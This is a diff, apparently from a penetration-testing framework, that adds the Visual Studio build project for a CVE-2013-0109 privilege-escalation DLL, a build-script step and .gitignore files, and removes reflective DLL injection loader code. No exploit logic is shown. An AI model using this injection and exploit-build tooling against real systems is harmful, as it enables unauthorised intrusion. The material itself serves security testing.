<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||||
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
|
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||||
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
|
</PropertyGroup>
|
||||||
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||||
|
<ImportGroup Label="ExtensionSettings">
|
||||||
|
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
|
||||||
|
</ImportGroup>
|
||||||
|
<ImportGroup Label="PropertySheets">
|
||||||
|
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||||
|
</ImportGroup>
|
||||||
|
<PropertyGroup Label="UserMacros" />
|
||||||
|
<PropertyGroup>
|
||||||
|
<_ProjectFileVersion>10.0.30319.1</_ProjectFileVersion>
|
||||||
|
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||||
|
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||||
|
<LinkIncremental>false</LinkIncremental>
|
||||||
|
<GenerateManifest>false</GenerateManifest>
|
||||||
|
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
|
||||||
|
<CodeAnalysisRules />
|
||||||
|
<CodeAnalysisRuleAssemblies />
|
||||||
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
|
</PropertyGroup>
|
||||||
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
|
<ClCompile>
|
||||||
|
<Optimization>Disabled</Optimization>
|
||||||
|
<AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||||
|
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;nvidia_nvsvcessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<MinimalRebuild>true</MinimalRebuild>
|
||||||
|
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
|
||||||
|
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
|
||||||
|
<PrecompiledHeader>
|
||||||
|
</PrecompiledHeader>
|
||||||
|
<WarningLevel>Level3</WarningLevel>
|
||||||
|
</ClCompile>
|
||||||
|
<Link>
|
||||||
|
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||||
|
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
|
||||||
|
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
|
||||||
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
|
<SubSystem>Windows</SubSystem>
|
||||||
|
<TargetMachine>MachineX86</TargetMachine>
|
||||||
|
<ModuleDefinitionFile>
|
||||||
|
</ModuleDefinitionFile>
|
||||||
|
<AdditionalOptions>/ignore:4070</AdditionalOptions>
|
||||||
|
</Link>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
|
<ResourceCompile>
|
||||||
|
<PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
</ResourceCompile>
|
||||||
|
</ItemDefinitionGroup>
|
||||||
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
|
<ClCompile>
|
||||||
|
<Optimization>MinSpace</Optimization>
|
||||||
|
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||||
|
<IntrinsicFunctions>false</IntrinsicFunctions>
|
||||||
|
<AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||||
|
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;nvidia_nvsvcessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<StringPooling>true</StringPooling>
|
||||||
|
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||||
|
<FunctionLevelLinking>false</FunctionLevelLinking>
|
||||||
|
<PrecompiledHeader>
|
||||||
|
</PrecompiledHeader>
|
||||||
|
<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
|
||||||
|
<ObjectFileName>$(OutDir)\</ObjectFileName>
|
||||||
|
<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
|
||||||
|
<WarningLevel>Level3</WarningLevel>
|
||||||
|
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
|
||||||
|
<BufferSecurityCheck>false</BufferSecurityCheck>
|
||||||
|
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||||
|
</ClCompile>
|
||||||
|
<Link>
|
||||||
|
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||||
|
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
|
||||||
|
<IgnoreAllDefaultLibraries>false</IgnoreAllDefaultLibraries>
|
||||||
|
<IgnoreSpecificDefaultLibraries>%(IgnoreSpecificDefaultLibraries)</IgnoreSpecificDefaultLibraries>
|
||||||
|
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
|
||||||
|
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||||
|
<GenerateMapFile>true</GenerateMapFile>
|
||||||
|
<MapFileName>$(OutDir)\nvidia_nvsvc.map</MapFileName>
|
||||||
|
<SubSystem>Windows</SubSystem>
|
||||||
|
<OptimizeReferences>
|
||||||
|
</OptimizeReferences>
|
||||||
|
<EnableCOMDATFolding>
|
||||||
|
</EnableCOMDATFolding>
|
||||||
|
<RandomizedBaseAddress>false</RandomizedBaseAddress>
|
||||||
|
<DataExecutionPrevention>
|
||||||
|
</DataExecutionPrevention>
|
||||||
|
<ImportLibrary>$(OutDir)\nvidia_nvsvc.lib</ImportLibrary>
|
||||||
|
<TargetMachine>MachineX86</TargetMachine>
|
||||||
|
<Profile>false</Profile>
|
||||||
|
<ModuleDefinitionFile>
|
||||||
|
</ModuleDefinitionFile>
|
||||||
|
<AdditionalOptions>/ignore:4070</AdditionalOptions>
|
||||||
|
</Link>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
|
||||||
|
IF EXIST "..\..\..\..\..\data\exploits\CVE-2013-0109\" GOTO COPY
|
||||||
|
mkdir "..\..\..\..\..\data\exploits\CVE-2013-0109\"
|
||||||
|
:COPY
|
||||||
|
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2013-0109\"</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
|
</ItemDefinitionGroup>
|
||||||
|
<ItemGroup>
|
||||||
|
<ClCompile Include="dllmain.c" />
|
||||||
|
<ClCompile Include="nvidia_nvsvc.cpp" />
|
||||||
|
</ItemGroup>
|
||||||
|
<ItemGroup>
|
||||||
|
<ClInclude Include="nvidia_nvsvc.h" />
|
||||||
|
</ItemGroup>
|
||||||
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||||
|
<ImportGroup Label="ExtensionTargets">
|
||||||
|
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
|
||||||
|
</ImportGroup>
|
||||||
|
</Project>
|
10
external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.vcxproj.filters
vendored
Executable file
10
external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.vcxproj.filters
vendored
Executable file
|
@ -0,0 +1,10 @@
|
||||||
|
<?xml version="1.0" encoding="utf-8"?>
|
||||||
|
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||||
|
<ItemGroup>
|
||||||
|
<ClCompile Include="nvidia_nvsvc.cpp" />
|
||||||
|
<ClCompile Include="dllmain.c" />
|
||||||
|
</ItemGroup>
|
||||||
|
<ItemGroup>
|
||||||
|
<ClInclude Include="nvidia_nvsvc.h" />
|
||||||
|
</ItemGroup>
|
||||||
|
</Project>
|
|
@ -0,0 +1,152 @@
|
||||||
|
## Ignore Visual Studio temporary files, build results, and
|
||||||
|
## files generated by popular Visual Studio add-ons.
|
||||||
|
|
||||||
|
# User-specific files
|
||||||
|
*.suo
|
||||||
|
*.user
|
||||||
|
*.sln.docstates
|
||||||
|
|
||||||
|
# Build results
|
||||||
|
|
||||||
|
[Dd]ebug/
|
||||||
|
[Rr]elease/
|
||||||
|
x64/
|
||||||
|
build/
|
||||||
|
[Bb]in/
|
||||||
|
[Oo]bj/
|
||||||
|
|
||||||
|
# Enable "build/" folder in the NuGet Packages folder since NuGet packages use it for MSBuild targets
|
||||||
|
!packages/*/build/
|
||||||
|
|
||||||
|
# MSTest test Results
|
||||||
|
[Tt]est[Rr]esult*/
|
||||||
|
[Bb]uild[Ll]og.*
|
||||||
|
|
||||||
|
*_i.c
|
||||||
|
*_p.c
|
||||||
|
*.ilk
|
||||||
|
*.meta
|
||||||
|
*.obj
|
||||||
|
*.pch
|
||||||
|
*.pdb
|
||||||
|
*.pgc
|
||||||
|
*.pgd
|
||||||
|
*.rsp
|
||||||
|
*.sbr
|
||||||
|
*.tlb
|
||||||
|
*.tli
|
||||||
|
*.tlh
|
||||||
|
*.tmp
|
||||||
|
*.tmp_proj
|
||||||
|
*.log
|
||||||
|
*.vspscc
|
||||||
|
*.vssscc
|
||||||
|
.builds
|
||||||
|
*.pidb
|
||||||
|
*.log
|
||||||
|
*.scc
|
||||||
|
|
||||||
|
# Visual C++ cache files
|
||||||
|
ipch/
|
||||||
|
*.aps
|
||||||
|
*.ncb
|
||||||
|
*.opensdf
|
||||||
|
*.sdf
|
||||||
|
*.cachefile
|
||||||
|
|
||||||
|
# Visual Studio profiler
|
||||||
|
*.psess
|
||||||
|
*.vsp
|
||||||
|
*.vspx
|
||||||
|
|
||||||
|
# Guidance Automation Toolkit
|
||||||
|
*.gpState
|
||||||
|
|
||||||
|
# ReSharper is a .NET coding add-in
|
||||||
|
_ReSharper*/
|
||||||
|
*.[Rr]e[Ss]harper
|
||||||
|
|
||||||
|
# TeamCity is a build add-in
|
||||||
|
_TeamCity*
|
||||||
|
|
||||||
|
# DotCover is a Code Coverage Tool
|
||||||
|
*.dotCover
|
||||||
|
|
||||||
|
# NCrunch
|
||||||
|
*.ncrunch*
|
||||||
|
.*crunch*.local.xml
|
||||||
|
|
||||||
|
# Installshield output folder
|
||||||
|
[Ee]xpress/
|
||||||
|
|
||||||
|
# DocProject is a documentation generator add-in
|
||||||
|
DocProject/buildhelp/
|
||||||
|
DocProject/Help/*.HxT
|
||||||
|
DocProject/Help/*.HxC
|
||||||
|
DocProject/Help/*.hhc
|
||||||
|
DocProject/Help/*.hhk
|
||||||
|
DocProject/Help/*.hhp
|
||||||
|
DocProject/Help/Html2
|
||||||
|
DocProject/Help/html
|
||||||
|
|
||||||
|
# Click-Once directory
|
||||||
|
publish/
|
||||||
|
|
||||||
|
# Publish Web Output
|
||||||
|
*.Publish.xml
|
||||||
|
*.pubxml
|
||||||
|
|
||||||
|
# NuGet Packages Directory
|
||||||
|
## TODO: If you have NuGet Package Restore enabled, uncomment the next line
|
||||||
|
#packages/
|
||||||
|
|
||||||
|
# Windows Azure Build Output
|
||||||
|
csx
|
||||||
|
*.build.csdef
|
||||||
|
|
||||||
|
# Windows Store app package directory
|
||||||
|
AppPackages/
|
||||||
|
|
||||||
|
# Others
|
||||||
|
sql/
|
||||||
|
*.Cache
|
||||||
|
ClientBin/
|
||||||
|
[Ss]tyle[Cc]op.*
|
||||||
|
~$*
|
||||||
|
*~
|
||||||
|
*.dbmdl
|
||||||
|
*.[Pp]ublish.xml
|
||||||
|
*.pfx
|
||||||
|
*.publishsettings
|
||||||
|
|
||||||
|
# RIA/Silverlight projects
|
||||||
|
Generated_Code/
|
||||||
|
|
||||||
|
# Backup & report files from converting an old project file to a newer
|
||||||
|
# Visual Studio version. Backup files are not needed, because we have git ;-)
|
||||||
|
_UpgradeReport_Files/
|
||||||
|
Backup*/
|
||||||
|
UpgradeLog*.XML
|
||||||
|
UpgradeLog*.htm
|
||||||
|
|
||||||
|
# SQL Server files
|
||||||
|
App_Data/*.mdf
|
||||||
|
App_Data/*.ldf
|
||||||
|
|
||||||
|
# =========================
|
||||||
|
# Windows detritus
|
||||||
|
# =========================
|
||||||
|
|
||||||
|
# Windows image file caches
|
||||||
|
Thumbs.db
|
||||||
|
ehthumbs.db
|
||||||
|
|
||||||
|
# Folder config file
|
||||||
|
Desktop.ini
|
||||||
|
|
||||||
|
# Recycle Bin used on file shares
|
||||||
|
$RECYCLE.BIN/
|
||||||
|
|
||||||
|
# Mac crap
|
||||||
|
.DS_Store
|
||||||
|
|
|
@ -26,6 +26,13 @@ PUSHD CVE-2010-0232
|
||||||
msbuild.exe make.msbuild /target:%PLAT%
|
msbuild.exe make.msbuild /target:%PLAT%
|
||||||
POPD
|
POPD
|
||||||
|
|
||||||
|
IF "%ERRORLEVEL%"=="0" (
|
||||||
|
ECHO "Building CVE-2013-0109 (nvidia_nvsvc)"
|
||||||
|
PUSHD CVE-2013-0109
|
||||||
|
msbuild.exe make.msbuild /target:%PLAT%
|
||||||
|
POPD
|
||||||
|
)
|
||||||
|
|
||||||
IF "%ERRORLEVEL%"=="0" (
|
IF "%ERRORLEVEL%"=="0" (
|
||||||
ECHO "Building CVE-2013-3660 (ppr_flatten_rec)"
|
ECHO "Building CVE-2013-3660 (ppr_flatten_rec)"
|
||||||
PUSHD CVE-2013-3660
|
PUSHD CVE-2013-3660
|
||||||
|
|
|
@ -0,0 +1,152 @@
|
||||||
|
## Ignore Visual Studio temporary files, build results, and
|
||||||
|
## files generated by popular Visual Studio add-ons.
|
||||||
|
|
||||||
|
# User-specific files
|
||||||
|
*.suo
|
||||||
|
*.user
|
||||||
|
*.sln.docstates
|
||||||
|
|
||||||
|
# Build results
|
||||||
|
|
||||||
|
[Dd]ebug/
|
||||||
|
[Rr]elease/
|
||||||
|
x64/
|
||||||
|
build/
|
||||||
|
[Bb]in/
|
||||||
|
[Oo]bj/
|
||||||
|
|
||||||
|
# Enable "build/" folder in the NuGet Packages folder since NuGet packages use it for MSBuild targets
|
||||||
|
!packages/*/build/
|
||||||
|
|
||||||
|
# MSTest test Results
|
||||||
|
[Tt]est[Rr]esult*/
|
||||||
|
[Bb]uild[Ll]og.*
|
||||||
|
|
||||||
|
*_i.c
|
||||||
|
*_p.c
|
||||||
|
*.ilk
|
||||||
|
*.meta
|
||||||
|
*.obj
|
||||||
|
*.pch
|
||||||
|
*.pdb
|
||||||
|
*.pgc
|
||||||
|
*.pgd
|
||||||
|
*.rsp
|
||||||
|
*.sbr
|
||||||
|
*.tlb
|
||||||
|
*.tli
|
||||||
|
*.tlh
|
||||||
|
*.tmp
|
||||||
|
*.tmp_proj
|
||||||
|
*.log
|
||||||
|
*.vspscc
|
||||||
|
*.vssscc
|
||||||
|
.builds
|
||||||
|
*.pidb
|
||||||
|
*.log
|
||||||
|
*.scc
|
||||||
|
|
||||||
|
# Visual C++ cache files
|
||||||
|
ipch/
|
||||||
|
*.aps
|
||||||
|
*.ncb
|
||||||
|
*.opensdf
|
||||||
|
*.sdf
|
||||||
|
*.cachefile
|
||||||
|
|
||||||
|
# Visual Studio profiler
|
||||||
|
*.psess
|
||||||
|
*.vsp
|
||||||
|
*.vspx
|
||||||
|
|
||||||
|
# Guidance Automation Toolkit
|
||||||
|
*.gpState
|
||||||
|
|
||||||
|
# ReSharper is a .NET coding add-in
|
||||||
|
_ReSharper*/
|
||||||
|
*.[Rr]e[Ss]harper
|
||||||
|
|
||||||
|
# TeamCity is a build add-in
|
||||||
|
_TeamCity*
|
||||||
|
|
||||||
|
# DotCover is a Code Coverage Tool
|
||||||
|
*.dotCover
|
||||||
|
|
||||||
|
# NCrunch
|
||||||
|
*.ncrunch*
|
||||||
|
.*crunch*.local.xml
|
||||||
|
|
||||||
|
# Installshield output folder
|
||||||
|
[Ee]xpress/
|
||||||
|
|
||||||
|
# DocProject is a documentation generator add-in
|
||||||
|
DocProject/buildhelp/
|
||||||
|
DocProject/Help/*.HxT
|
||||||
|
DocProject/Help/*.HxC
|
||||||
|
DocProject/Help/*.hhc
|
||||||
|
DocProject/Help/*.hhk
|
||||||
|
DocProject/Help/*.hhp
|
||||||
|
DocProject/Help/Html2
|
||||||
|
DocProject/Help/html
|
||||||
|
|
||||||
|
# Click-Once directory
|
||||||
|
publish/
|
||||||
|
|
||||||
|
# Publish Web Output
|
||||||
|
*.Publish.xml
|
||||||
|
*.pubxml
|
||||||
|
|
||||||
|
# NuGet Packages Directory
|
||||||
|
## TODO: If you have NuGet Package Restore enabled, uncomment the next line
|
||||||
|
#packages/
|
||||||
|
|
||||||
|
# Windows Azure Build Output
|
||||||
|
csx
|
||||||
|
*.build.csdef
|
||||||
|
|
||||||
|
# Windows Store app package directory
|
||||||
|
AppPackages/
|
||||||
|
|
||||||
|
# Others
|
||||||
|
sql/
|
||||||
|
*.Cache
|
||||||
|
ClientBin/
|
||||||
|
[Ss]tyle[Cc]op.*
|
||||||
|
~$*
|
||||||
|
*~
|
||||||
|
*.dbmdl
|
||||||
|
*.[Pp]ublish.xml
|
||||||
|
*.pfx
|
||||||
|
*.publishsettings
|
||||||
|
|
||||||
|
# RIA/Silverlight projects
|
||||||
|
Generated_Code/
|
||||||
|
|
||||||
|
# Backup & report files from converting an old project file to a newer
|
||||||
|
# Visual Studio version. Backup files are not needed, because we have git ;-)
|
||||||
|
_UpgradeReport_Files/
|
||||||
|
Backup*/
|
||||||
|
UpgradeLog*.XML
|
||||||
|
UpgradeLog*.htm
|
||||||
|
|
||||||
|
# SQL Server files
|
||||||
|
App_Data/*.mdf
|
||||||
|
App_Data/*.ldf
|
||||||
|
|
||||||
|
# =========================
|
||||||
|
# Windows detritus
|
||||||
|
# =========================
|
||||||
|
|
||||||
|
# Windows image file caches
|
||||||
|
Thumbs.db
|
||||||
|
ehthumbs.db
|
||||||
|
|
||||||
|
# Folder config file
|
||||||
|
Desktop.ini
|
||||||
|
|
||||||
|
# Recycle Bin used on file shares
|
||||||
|
$RECYCLE.BIN/
|
||||||
|
|
||||||
|
# Mac crap
|
||||||
|
.DS_Store
|
||||||
|
|
|
@ -1,131 +0,0 @@
|
||||||
//===============================================================================================//
|
|
||||||
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
|
|
||||||
// All rights reserved.
|
|
||||||
//
|
|
||||||
// Redistribution and use in source and binary forms, with or without modification, are permitted
|
|
||||||
// provided that the following conditions are met:
|
|
||||||
//
|
|
||||||
// * Redistributions of source code must retain the above copyright notice, this list of
|
|
||||||
// conditions and the following disclaimer.
|
|
||||||
//
|
|
||||||
// * Redistributions in binary form must reproduce the above copyright notice, this list of
|
|
||||||
// conditions and the following disclaimer in the documentation and/or other materials provided
|
|
||||||
// with the distribution.
|
|
||||||
//
|
|
||||||
// * Neither the name of Harmony Security nor the names of its contributors may be used to
|
|
||||||
// endorse or promote products derived from this software without specific prior written permission.
|
|
||||||
//
|
|
||||||
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
|
|
||||||
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
|
|
||||||
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
|
|
||||||
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
|
|
||||||
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
|
|
||||||
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
|
|
||||||
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
|
|
||||||
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
|
|
||||||
// POSSIBILITY OF SUCH DAMAGE.
|
|
||||||
//===============================================================================================//
|
|
||||||
#include "LoadLibraryR.h"
|
|
||||||
//===============================================================================================//
|
|
||||||
DWORD Rva2Offset( DWORD dwRva, UINT_PTR uiBaseAddress )
|
|
||||||
{
|
|
||||||
WORD wIndex = 0;
|
|
||||||
PIMAGE_SECTION_HEADER pSectionHeader = NULL;
|
|
||||||
PIMAGE_NT_HEADERS pNtHeaders = NULL;
|
|
||||||
|
|
||||||
pNtHeaders = (PIMAGE_NT_HEADERS)(uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew);
|
|
||||||
|
|
||||||
pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader);
|
|
||||||
|
|
||||||
if( dwRva < pSectionHeader[0].PointerToRawData )
|
|
||||||
return dwRva;
|
|
||||||
|
|
||||||
for( wIndex=0 ; wIndex < pNtHeaders->FileHeader.NumberOfSections ; wIndex++ )
|
|
||||||
{
|
|
||||||
if( dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData) )
|
|
||||||
return ( dwRva - pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].PointerToRawData );
|
|
||||||
}
|
|
||||||
|
|
||||||
return 0;
|
|
||||||
}
|
|
||||||
//===============================================================================================//
|
|
||||||
DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer )
|
|
||||||
{
|
|
||||||
UINT_PTR uiBaseAddress = 0;
|
|
||||||
UINT_PTR uiExportDir = 0;
|
|
||||||
UINT_PTR uiNameArray = 0;
|
|
||||||
UINT_PTR uiAddressArray = 0;
|
|
||||||
UINT_PTR uiNameOrdinals = 0;
|
|
||||||
DWORD dwCounter = 0;
|
|
||||||
#ifdef _WIN64
|
|
||||||
DWORD dwMeterpreterArch = 2;
|
|
||||||
#else
|
|
||||||
DWORD dwMeterpreterArch = 1;
|
|
||||||
#endif
|
|
||||||
|
|
||||||
uiBaseAddress = (UINT_PTR)lpReflectiveDllBuffer;
|
|
||||||
|
|
||||||
// get the File Offset of the modules NT Header
|
|
||||||
uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
|
|
||||||
|
|
||||||
// currenlty we can only process a PE file which is the same type as the one this fuction has
|
|
||||||
// been compiled as, due to various offset in the PE structures being defined at compile time.
|
|
||||||
if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x010B ) // PE32
|
|
||||||
{
|
|
||||||
if( dwMeterpreterArch != 1 )
|
|
||||||
return 0;
|
|
||||||
}
|
|
||||||
else if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x020B ) // PE64
|
|
||||||
{
|
|
||||||
if( dwMeterpreterArch != 2 )
|
|
||||||
return 0;
|
|
||||||
}
|
|
||||||
else
|
|
||||||
{
|
|
||||||
return 0;
|
|
||||||
}
|
|
||||||
|
|
||||||
// uiNameArray = the address of the modules export directory entry
|
|
||||||
uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
|
|
||||||
|
|
||||||
// get the File Offset of the export directory
|
|
||||||
uiExportDir = uiBaseAddress + Rva2Offset( ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress, uiBaseAddress );
|
|
||||||
|
|
||||||
// get the File Offset for the array of name pointers
|
|
||||||
uiNameArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames, uiBaseAddress );
|
|
||||||
|
|
||||||
// get the File Offset for the array of addresses
|
|
||||||
uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );
|
|
||||||
|
|
||||||
// get the File Offset for the array of name ordinals
|
|
||||||
uiNameOrdinals = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals, uiBaseAddress );
|
|
||||||
|
|
||||||
// get a counter for the number of exported functions...
|
|
||||||
dwCounter = ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->NumberOfNames;
|
|
||||||
|
|
||||||
// loop through all the exported functions to find the ReflectiveLoader
|
|
||||||
while( dwCounter-- )
|
|
||||||
{
|
|
||||||
char * cpExportedFunctionName = (char *)(uiBaseAddress + Rva2Offset( DEREF_32( uiNameArray ), uiBaseAddress ));
|
|
||||||
|
|
||||||
if( strstr( cpExportedFunctionName, "ReflectiveLoader" ) != NULL )
|
|
||||||
{
|
|
||||||
// get the File Offset for the array of addresses
|
|
||||||
uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );
|
|
||||||
|
|
||||||
// use the functions name ordinal as an index into the array of name pointers
|
|
||||||
uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
|
|
||||||
|
|
||||||
// return the File Offset to the ReflectiveLoader() functions code...
|
|
||||||
return Rva2Offset( DEREF_32( uiAddressArray ), uiBaseAddress );
|
|
||||||
}
|
|
||||||
// get the next exported function name
|
|
||||||
uiNameArray += sizeof(DWORD);
|
|
||||||
|
|
||||||
// get the next exported function name ordinal
|
|
||||||
uiNameOrdinals += sizeof(WORD);
|
|
||||||
}
|
|
||||||
|
|
||||||
return 0;
|
|
||||||
}
|
|
||||||
//===============================================================================================//
|
|
|
@ -1,37 +0,0 @@
|
||||||
//===============================================================================================//
|
|
||||||
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
|
|
||||||
// All rights reserved.
|
|
||||||
//
|
|
||||||
// Redistribution and use in source and binary forms, with or without modification, are permitted
|
|
||||||
// provided that the following conditions are met:
|
|
||||||
//
|
|
||||||
// * Redistributions of source code must retain the above copyright notice, this list of
|
|
||||||
// conditions and the following disclaimer.
|
|
||||||
//
|
|
||||||
// * Redistributions in binary form must reproduce the above copyright notice, this list of
|
|
||||||
// conditions and the following disclaimer in the documentation and/or other materials provided
|
|
||||||
// with the distribution.
|
|
||||||
//
|
|
||||||
// * Neither the name of Harmony Security nor the names of its contributors may be used to
|
|
||||||
// endorse or promote products derived from this software without specific prior written permission.
|
|
||||||
//
|
|
||||||
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
|
|
||||||
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
|
|
||||||
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
|
|
||||||
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
|
|
||||||
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
|
|
||||||
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
|
|
||||||
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
|
|
||||||
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
|
|
||||||
// POSSIBILITY OF SUCH DAMAGE.
|
|
||||||
//===============================================================================================//
|
|
||||||
#ifndef _VNCDLL_LOADER_LOADLIBRARYR_H
|
|
||||||
#define _VNCDLL_LOADER_LOADLIBRARYR_H
|
|
||||||
//===============================================================================================//
|
|
||||||
#include "ReflectiveDLLInjection.h"
|
|
||||||
|
|
||||||
DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer );
|
|
||||||
|
|
||||||
//===============================================================================================//
|
|
||||||
#endif
|
|
||||||
//===============================================================================================//
|
|
|
@ -1,53 +0,0 @@
|
||||||
//===============================================================================================//
|
|
||||||
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
|
|
